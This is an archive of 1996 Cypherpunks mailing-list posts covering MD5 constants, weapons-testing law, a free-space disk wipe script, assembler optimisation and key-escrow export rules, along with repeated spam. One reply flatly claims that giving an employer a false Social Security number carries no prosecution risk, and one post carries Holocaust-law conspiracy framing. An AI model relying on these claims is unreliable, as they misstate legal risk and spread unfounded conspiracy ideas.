Message-ID: <199612150434.WAA02138@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:37:56 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02149@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:17 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02157@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:20 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02162@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 15 Dec 1996 13:53:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: What a great meeting!
Message-ID: <3.0.32.19961214223435.006b32cc@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I just returned from the monthly CP meeting. This month's meeting was
hosted by PGP, Inc. thanks to the efforts of Dave del Torto, who is now
with PGP.

I would like to publicly thank Dave for making this meeting possible. It
was the best CP meeting in a long time. I very much enjoyed Eric Blossom's
demo of his voice encryption product. The sound quality is the best I ever
heard in such a product. And it uses 3DES. The encryption and sound quality
are much better than what you get from AT&T's STU-III.

But nothing could have prepared me for the generous gift that PGP, Inc.
made to each attendee: a four volume bound set of the *full* pre-alpha
source to PGP 3.0, totaling almost 2,000 pages!

Way to go, Dave.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:38:00 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02166@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:28 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02173@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:30 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02177@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:31 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02183@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:33 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150434.WAA02196@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:38:12 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150435.WAA02230@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:35 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150435.WAA02234@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:40:00 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150435.WAA02239@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:36:37 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150435.WAA02245@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zer0.Faith.Inc.@website.chek.it.out
Date: Sat, 14 Dec 1996 20:38:18 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Chek it out
Message-ID: <199612150435.WAA02248@unix.newnorth.net>
MIME-Version: 1.0
Content-Type: text/plain


www.geocities.com/SiliconValley/Heights/2608
It's Kool, but still under construction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 15 Dec 1996 13:53:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Magic Numbers in MD5
Message-ID: <v02140b03aed94aedb645@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:46 PM 12/14/1996, Mark M. wrote:
>On Fri, 13 Dec 1996, Peter Hendrickson wrote:
>> First, we have the four chaining variables, A, B, C, and D which
>> are initialized with apparently random numbers.
>
>Random?
>
>A = 0x01234567
>B = 0x89abcdef
>C = 0xfedcba98
>D = 0x76543210

Why yes, those bits are just as likely as any other set.  ;-)

At 11:39 AM 12/14/1996, Norman Hardy wrote:
>Perhaps random numbers would be stronger but they would not be manifestly
>random.  MD5's formula for t_i precludes the possibility that the definer
>of MD5 chose the numbers accoriding to some undisclosed principles that
>would allow him a trap door.

>The following code computes the magic numbers without requiring trig functions:
>
>...[nifty code sample redacted]...
>
>An alternative would have been to let t_i be MD4(i) or SHA(i).
>
>Using SHA to define MD5 would have required collusion between Rivest
>and NSA to allow for a trap door. Even then it would have been very difficult.

Still, one prefers to be careful.  Rivest is said to be a clever fellow.
One or two people at the NSA must know what they are doing.  We wouldn't
want to bet they aren't smart enough to invent something surprising.

Perhaps we should define MD5-Cypherpunks.  All interested parties submit
sealed random values for the chaining variables and the t_i constants.  The
new constants are determined by opening the envelopes and XORing all
the values.

This probably isn't worth the trouble given MD5's known weaknesses,
but it might be cool for other algorithms.  Does it seem reasonable
that this would make cryptanalysis more challenging?  One could
imagine that brute force attacks exist which are less efficient when
the same setup cannot be used for every message.  Or, that it is
expensive to determine weaknesses for particular sets of constants.

It would cause interoperability problems, but one could imagine
some organizations would prefer to use their own version of
standard algorithms for internal communications if it really
did raise the cost of attack.  The changes in software would
be minimal.

Incidentally, when weaknesses were discovered in MD5, did they depend
on a particular set of constants, or were the weaknesses general?  (I
assume the latter, but I would like to know for sure.)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jim@santafe.arch.columbia.edu>
Date: Sun, 15 Dec 1996 13:50:11 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <Pine.LNX.3.95.961214180857.879A-100000@random.sp.org>
Message-ID: <Pine.NEB.3.95.961215073357.4601A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain



> The Deviant wrote:
> > On Fri, 13 Dec 1996, Lucky Green wrote:
> > Folks,
> > Did you know that the Feds may legally test chemical and biological weapons
> > on the civilian population as long as they give 30 days advance notice to
>
> No, they can't.  Development, testing, and use of Biological weapons is
> banned by the Geneva conventions (among others).  International treaty
> outweighs USC.

Correct me if I am wrong, but I believe the Geneva conventions do not apply
to nations acting upon their own citizens...  This showed up in the legal
wrangling over whether the brutality in Bosnia-Herzegovena was part of a
civil war or a war between nations, and hence whether an international
tribunal had authority...

--
				Jim Wise
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@suburbia.net
Date: Sat, 14 Dec 1996 12:56:13 -0800 (PST)
To: ghio@myriad.alias.net (Matthew Ghio)
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612141959.OAA00409@myriad>
Message-ID: <19961214205552.1079.qmail@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


> Dale Thorn <dthorn@gte.net> wrote:
> > It's a hundred times easier to do tools for the IBM PC.  I make
> > utilities for the PC, and it would take no more than ten or fifteen
> > minutes to cook this one up.
> 
> It took me less than ten minutes...
> 
> > But nobody answered my question:  Is there a shortcut way to do the
> > wipe, say, thirty times?  Ordinarily, I'd run the program thirty
> > times, which would consist of a data write followed by a flush,
> > which would take 30x amount of time.
> 
> Try this in Linux...
> 
> #!/bin/csh
> set n=1
> loop:
> cat /dev/urandom >/tmp/fill
+ sync;df >/dev/null
> rm /tmp/fill
> @ n = $n + 1
> if ( $n < 30 ) then
>   goto loop
> endif
> 

and it just might work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@suburbia.net
Date: Sat, 14 Dec 1996 13:09:23 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Personal Reputation, was Re: Java DES breaker?
In-Reply-To: <cwXXyD188w165w@bwalk.dm.com>
Message-ID: <19961214210859.2844.qmail@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


> Bill Frantz <frantz@netcom.com> writes:
> 
> > At 6:39 PM -0800 12/13/96, Dr.Dimitri Vulis KOTM wrote:
> > >It does. John Gilmore is a proven liar. He has no credibility.
> >
> > John will be a much later addition to my killfile than you.
> 
> John Gilmore (spit) is full of shit just like his boyfriend Timmy May (fart).

Vulis, I can't understand your need for these childish quips. They just make
you look idiotic. At least have some sense of your own dignity.

> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Sun, 15 Dec 1996 13:47:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Medical anonymity
Message-ID: <1.5.4.16.19961215111602.345f023e@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



It probably should no longer surprise me when the popular press is ignorant
of anonymity, but of course it still does.  There were several otherwise
excellent articles in the Detroit News today (http://www.detnews.com/) about
DNA research and inherited diseases (specifically breast cancer).  The gist
of one of the stories is that there are several reasons that deter people
from being tested for genetic predispositions to disease, but that one of
the primary ones is the fear of losing one's health insurance.  Nowhere in
the article was the possibility of anonymous testing mentioned.  This is a
severe oversight in my opinion.  Clearly, being tested for a genetic
disorder would not require disclosure of one's true name, and the testing
could be paid for in cash (of course providing genetic material could
eventually be indexed into a database to discover that true name, but I
doubt we are there yet, at least I hope not!)

The implication of most articles regarding this subject are that "there
ought to be a law" prohibiting disclosure by medical practioners.  Of
course, most of us would probably agree that the proper approach is allowing
non-disclosure by those tested.  I don't know whether this is currently
"legal", is there a legal requirement that medical practioners have "true
names" before testing?  

Medical testing provides a unique opportunity to acquaint the public with
the benefits of anonymity.  Most americans can clearly see the payoff - not
having your health insurance cancelled.  Other anonymous transactions have
somewhat less tangible benefits for the majority of americans (sorry to be
so america-centric, maybe I should change the phrasing to citizen-units ;-)

That's my minor rant for a Sunday AM.  Now back to my x-mas shopping!

        Clay

*******************************************************
Clay Olbon			    olbon@ix.netcom.com
sys-admin, engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 15 Dec 1996 13:49:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects
In-Reply-To: <v03007803aed902ffd819@[206.119.69.46]>
Message-ID: <XDcZyD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga <rah@shipwright.com> writes:
> At 7:09 pm -0500 12/14/96, Adam Shostack wrote:
> >	My understanding is that they choose not to continue
> >per^H^Hrosecuting Phil for putting the code up for FTP.  Thus, this is
> >a change.  Or did Phil not put the code up for FTP?
>
> Actually, it's my understanding that PRZ didn't do it personally. Someone
> else got the code from Phil and put it on the net. Phil had nothing to do
> with it. Except for writing PGP, of course. :-).

And what exactly was Kelly Goen's role?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 15 Dec 1996 13:49:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: In Defense of Anecdotal Evidence (fwd)
Message-ID: <199612151513.JAA03511@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 14 Dec 1996 21:53:02 -0800
> Subject: Re: In Defense of Anecdotal Evidence
> 
> Yes and no.  Depends on the objective. If I had to purchase and install
> a new server for my employer, and not being an expert in security myself,
> I would (barring having a very trusted friend for advice) certainly be
> inclined to trust the published reports more than anecdotes, even when
> the anecdotes come from erstwhile reputable posters on these lists.

Published reports as done in the computer magazines are anecdotal evidence.
They neither print their error bands on their stats, the raw results of
their tests, or their complete test proceedures.

                                                 Jim Choate
                                                 CyberTects
                                                 ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Dec 1996 13:48:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Social Security Fraud
Message-ID: <3.0.1.32.19961215094058.00cbf43c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:26 PM 12/13/96 -0800, Huge Cajones Remailer wrote:
>So how often are people prosecuted under these laws?  That is, if you
>pay your taxes and don't steal from people, but do give your employer
>the wrong SS number, what are the odds that you will be prosecuted?
>
>If prosecuted, are the odds high that you will receive jail time?
>Assume a good lawyer, spotless criminal record, and a favored
>racial class.

Chances of prosecution zero.  Chances of time served zero.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 15 Dec 1996 17:14:05 -0800 (PST)
To: Jim Wise <jim@santafe.arch.columbia.edu>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <Pine.NEB.3.95.961215073357.4601A-100000@localhost>
Message-ID: <32B43A02.56CE@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jim Wise wrote:
> > The Deviant wrote:
> > > On Fri, 13 Dec 1996, Lucky Green wrote:

> > > Did you know that the Feds may legally test chemical and biological weapons
> > > on the civilian population as long as they give 30 days advance notice to

> > No, they can't.  Development, testing, and use of Biological weapons is
> > banned by the Geneva conventions (among others).  International treaty
> > outweighs USC.

> Correct me if I am wrong, but I believe the Geneva conventions do not apply
> to nations acting upon their own citizens...  This showed up in the legal
> wrangling over whether the brutality in Bosnia-Herzegovena was part of a
> civil war or a war between nations, and hence whether an international
> tribunal had authority...

On a related note, the L.A. Times (not a real newspaper) has devoted a
tremendous amount of space to convincing their readers that a tribunal
can be put together to prosecute the Bosnian Serbs.  Anyone familiar
with the stories can undoubtedly argue that either the stories didn't
exactly say this, or they were obviously wishful thinking with no legal
weight, and so on.  My point is simply that the vast amount of valuable
newspaper space isn't being thrown away; it has a purpose which is tied
to investments, probably international.

Laws can take a back seat to a strong tide of public pressure - witness
the movements to keep trying people in court until a conviction can be
obtained to satisfy the public:  DeLaBeckwith, Powell/Koon et al, and
now O.J. Simpson.  The L.A. Times figures (as does former Atty. Gen.
Ramsey Clark in his work on the Gulf War) that if they stir up enough
"controversy" over the Bosnia issue, the international public will put
enough pressure on to satisfy the Times' agenda.

Further (and at the risk of being identified with a particular political
slant, which I don't have), this "newspaper" is actively collaborating
with other international interests to put the nail in Free Speech, via
the Holocaust issue.  Carto of Liberty Lobby fame (the bane of the ADL)
is down for the count again, and unlike the last two or three times, he
may not survive this one, probably because his supporters are thinning
out from old age. Carto's main theme in life, which I got in person one
day in 1993, is that the Holocaust has been co-opted by the National
Security State for a variety of reasons, one of which is to curtail
Free Speech (Holocaust deniers thrive on Free Speech), by passing laws
everywhere that make it a criminal offense to "doubt the Holocaust".

Again, my point isn't to argue any law, just to point out where change
in the law is going to come from.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Dec 1996 13:47:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Social Security Fraud
Message-ID: <3.0.1.32.19961215094900.00cbefbc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 AM 12/12/96 -0800, Huge Cajones Remailer wrote:
>
>It seems to me that in the case of an employee giving the wrong number
>to his employer, the only person that suffers is the employee through
>loss of future payments from the Social Security Administration.  The
>employer certainly doesn't suffer.  Assume that the income tax is
>paid.
>
>What laws would an employee violate?  What are the chances of
>conviction?  What are the likely penalties if convicted?
>
>Red Rackham

Anyone interested should Altavista "social security number FAQ" and read same.

DCF
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Sun, 15 Dec 1996 13:45:38 -0800 (PST)
To: "Mark M." <ph@netcom.com>
Subject: Re: Magic Numbers in MD5
Message-ID: <3.0.32.19961215112530.006a9580@best.com>
MIME-Version: 1.0
Content-Type: text/plain


digits of transcendental functions are conjectured to be randomly distributed.
however, some specifics of how the sin() function was utilized in MD5
were the basis for a successful attack on the compression function.  I don't 
recall the references.  not too hard to find tho.



..snip..

>> Does abs(sin()) have some properties that are especially conducive to
>> strengthening MD5 or is it just a function to generate mildly random
>> numbers?  If the latter, wouldn't the algorithm be stronger if it was
>> used with completely random numbers?
>
>I am not sure of the properties of abs(sin()).  I know that the S-boxes in
>Blowfish are initialized with pi.  I would guess that the purpose of using
>such values is to use easily generated pseudo-random numbers.
>
>Mark
>- -- 
>finger -l for PGP key
>PGP encrypted mail prefered.
>0xf9b22ba5 now revoked
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3
>Charset: noconv
>
>iQEVAwUBMrMD/SzIPc7jvyFpAQEA7gf9HAtV1Vy+3LO5OPOHyU9ZHoath32LhAwU
>PzODS/YJsY9fVxaMHOm15oL9D4CX2D5s/Y9cgrALG6pGzw4dBWJZJyqNAcbmsjp/
>B/jNL9jXKCXg1byIzplKSjJqDypLzIPf07xTIQVCC5IDmwZ7pR5owngH9MDaE8is
>aFiGZvuWNm7eHQg1kJSb40xQjkwszx+SP1Gv9+fvpys5GZLCTHwPx8SCpy7PXwNp
>lm8fgV9mjc7wZIpw73oqPZEb7Q3VHZUOUXS2i6XNF3UVXa4aykBg5VvALPt0tuvv
>ah5JjA6JP4STwSCj+HrnMpQJ8SCG4U3kKb54+WOl8H6eo7ekuEU8mw==
>=uNLG
>-----END PGP SIGNATURE-----
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 15 Dec 1996 13:44:35 -0800 (PST)
To: cryptography@c2.net
Subject: Gov't Clarifes Position-Surprise!
Message-ID: <1.5.4.32.19961215201616.003aa660@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from "Fred B. Ringel" <fredr@rivertown.net> on pgp-users list:
Hi all-
	A  list member forwarded this to me and I thought it was important
enough to pass on. Its a "clarification" of the Government's
"Key-Escrow/Key Recovery" position which is apparently "worldwide" in its
intended reach. Besides the orwellian (sp?) nature of the proposal, I
personally cannot imagine how this would be enforceable. 

	Anyway, its something to ponder...how the government intends not
only to restrict privacy rights at home, but extend those restrictions
beyond our borders.

	Fred
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Fred B. Ringel				Rivertown.Net
Systems Administrator			P.O. Box 532
and General Fixer-upper			Hastings, New York 10706
Voice/Fax/Support: 914.478.2885		Data: 914-478-4988
				
Westchester's Rivertown's Full Service Flat-Rate Internet Access Provider 
	E-mail "SEND-PGPKEY" in the Subject for my Public Key
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
----Begin Forwarded Message----
>From EPIC http://www.epic.org/crypto/export_controls/draft_regs_12_96.html 

**Commerce Department Prepares Draft Encryption Export Regulations**

December 11, 1996

The Commerce Department is circulating draft regulations that differ 
sharply from earlier assurances made by the White House to relax export 
controls on strong encryption. The draft regulations state that it is the 
aim of the  Commerce Department to promote "a worldwide key management 
infrastructure with the use of key recovery and key escrow encryption 
items." The proposal contrasts with earlier assurances that encryption 
standards would be voluntary and market-driven.  
     
The regulations would amend the Export Administration Regulations (EAR) 
by imposing national security and foreign policy controls ("EI" for 
Encryption Items) on certain information security systems and equipment,      
cryptographic devices (including recoverable encryption software) and 
related technology.  

For the first time, the Administration makes clear what it means by "Key 
Recovery Encryption." The regulations state that: 

For purposes of this rule, "recovery encryption products" refer to 
encryption products (including software) which allow law enforcement 
officials to obtain under proper legal authority and without           
the cooperation or knowledge of the user, the plaintext of encrypted data 
and communications.

This is an exact description of the original Clipper encryption proposal 
that was widely opposed by Internet users and industry when it was 
announced in 1993. 

 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 15 Dec 1996 15:32:49 -0800 (PST)
To: Dale Thorn <trei@process.com
Subject: Re: ASM vs portable code [WAS: Re: Java DES breaker?]
In-Reply-To: <199612131459.GAA06660@cygnus.com>
Message-ID: <v03007821aeda1d02eb3c@[205.187.203.136]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:28 PM -0800 12/14/96, Dale Thorn wrote:
>I remember sitting down with some ASM programmers in the mid 1980's
>(using x86 PCs), and at that time, looking at the Codeview tracings,
>it occurred to me that ASM would nearly always run 2x faster than 'C',
>something that is inherent in the processes.

Modern compiler peephole optimizers are quite good, and there is not much
to be gained by trying to beat them.  The real gains come from being able
to make more restrictive assumptions than a compiler based on your superior
knowledge of the program.

For example, most operating system kernels have a global pointer to the
current process.  Assembly language kernels normally dedicate a register to
hold that pointer.  In C, each separately compiled routine must re-load it
from its memory location because they can not coordinate register usage.
Parameter passing is another place this kind of global register assignment
can improve assembly programs.

Another place where this global view of a program helps is in re-loads
after calling externally compiled routines.  The compiler must assume that
the external routine has changed the variable while a smart programmer can
know better and save the re-load.  Even if the data is in the level 1
cache, most architectures can do at most one memory reference instruction
per cycle, and memory accesses seem to be the critical path for OS kernels.

These optimizations work better with register rich architectures such as
the R4000, Sparc, PowerPC etc. than they do on the popular Intel
architecture because there are more registers to use.

BTW - My experience with Assembler over C is more like 4:1 than 2:1.  YMMV!


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 15 Dec 1996 13:46:53 -0800 (PST)
To: Jim Wise <jim@santafe.arch.columbia.edu>
Subject: Re: [No joke] The Feds may legally gas us
In-Reply-To: <Pine.NEB.3.95.961215073357.4601A-100000@localhost>
Message-ID: <Pine.LNX.3.95.961215175530.2131A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 15 Dec 1996, Jim Wise wrote:

> 
> > The Deviant wrote:
> > > On Fri, 13 Dec 1996, Lucky Green wrote:
> > > Folks,
> > > Did you know that the Feds may legally test chemical and biological weapons
> > > on the civilian population as long as they give 30 days advance notice to
> >
> > No, they can't.  Development, testing, and use of Biological weapons is
> > banned by the Geneva conventions (among others).  International treaty
> > outweighs USC.
> 
> Correct me if I am wrong, but I believe the Geneva conventions do not apply
> to nations acting upon their own citizens...  This showed up in the legal
> wrangling over whether the brutality in Bosnia-Herzegovena was part of a
> civil war or a war between nations, and hence whether an international
> tribunal had authority...
> 

True; the Geneva conventions only apply to use on other nation's
citizenry, but i did note "among others".  There are several more which
ban development and testing of biological weapons (the names of which i
cannot recall, they are mentioned in the nonfiction book "Hot Zone").

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

        "Evil does seek to maintain power by suppressing the truth."
        "Or by misleading the innocent."
                -- Spock and McCoy, "And The Children Shall Lead",
                   stardate 5029.5.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMrQ79zCdEh3oIPAVAQFHgQf8CZ5hMveC1zoOgOyFg8nfXKMPdiju0URW
K5iXjpZQSDm6vnTD+eUxynA9FBdhfOB8JKXj/U9VKf6zy7PyL0ZALqsb0tD0k8Y3
eQ1soo3XKVB4Ru2aSVD+Hywr/1NRViPDzaUZSriEA37moke+ChrR9aBcjjxtOE+Y
+Z2asE5SYJDCTki/1N3+QVZqI9X2TX/QUpLmMgNyD523ihPeaBn85PR1bbx1rLFs
spy+Xg1u/oTIK23rQkBAN+Nd6V+fCuDirLoXnPkUs2PUjl44MwTJ76xQFiID4s9x
JWYotVuohV6WAP1UvwzlG7ARN7JD6G8LtlGwTjdxrgkQdS3pOa7hXg==
=oovV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Psionic Damage <zerofaith@mail.geocities.com>
Date: Sun, 15 Dec 1996 17:58:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: sorry for the spam!
Message-ID: <199612160157.RAA24380@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


I apologize 4 the spam, not my doing, Haven't figured out who waz
responsible, but I will understand if I amd kicked off this list.
Once again, I am sorry.
----------------------------------------------------------------------------
----------------------------------------------------------------------------
----------------------
Zer0 Faith Inc. H/P/A/V/C UNDER-WORLD
www.geocities.com/SiliconValley/Heights/2608

MEMBERZ:

GATEMASTER, VIRIZZ, KRASH, EVIL TWIN, PHONEHAZORD, PSIONIC DAMAGE,
MANTIKORE, ERADIKATOR, PSYCHODROME, SONIK, kOBRA, & KRYPTIK!

EMAIL:zerofaith@nlights.net (headquarterz) hakker1@hotmail.com (Delious's
Haus!) hackerz@juno.com (The Gatemaster'z palace) zerofaith@geocities.com
(delivery/help/requests/suggestions)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Sun, 15 Dec 1996 16:13:11 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: ASM vs portable code [WAS: Re: Java DES breaker?]
In-Reply-To: <199612131459.GAA06660@cygnus.com>
Message-ID: <32B493D9.558F@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
>
> In C, each separately compiled routine must re-load it from its
> memory location because they can not coordinate register usage.

There are such things as global optimizers that are quite capable of
locating heavily-used global variables.

> Another place where this global view of a program helps is in re-loads
> after calling externally compiled routines.  The compiler must assume 
> that the external routine has changed the variable 

No, it's not true that it "must" do that.  There are optimizer systems
that defer decisions until link time (the MIPS compilers for example).

That said, it's probably the case that a hand-written DES routine
could probably better a good optimizer; the size of the problem is
pretty small.  On the other hand, I suspect a specially-tuned 
optimizer that used (maybe; I'm making this up off the top of my
head) some sort of genetic techniques could find faster code sequences
than a human coder would.

^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
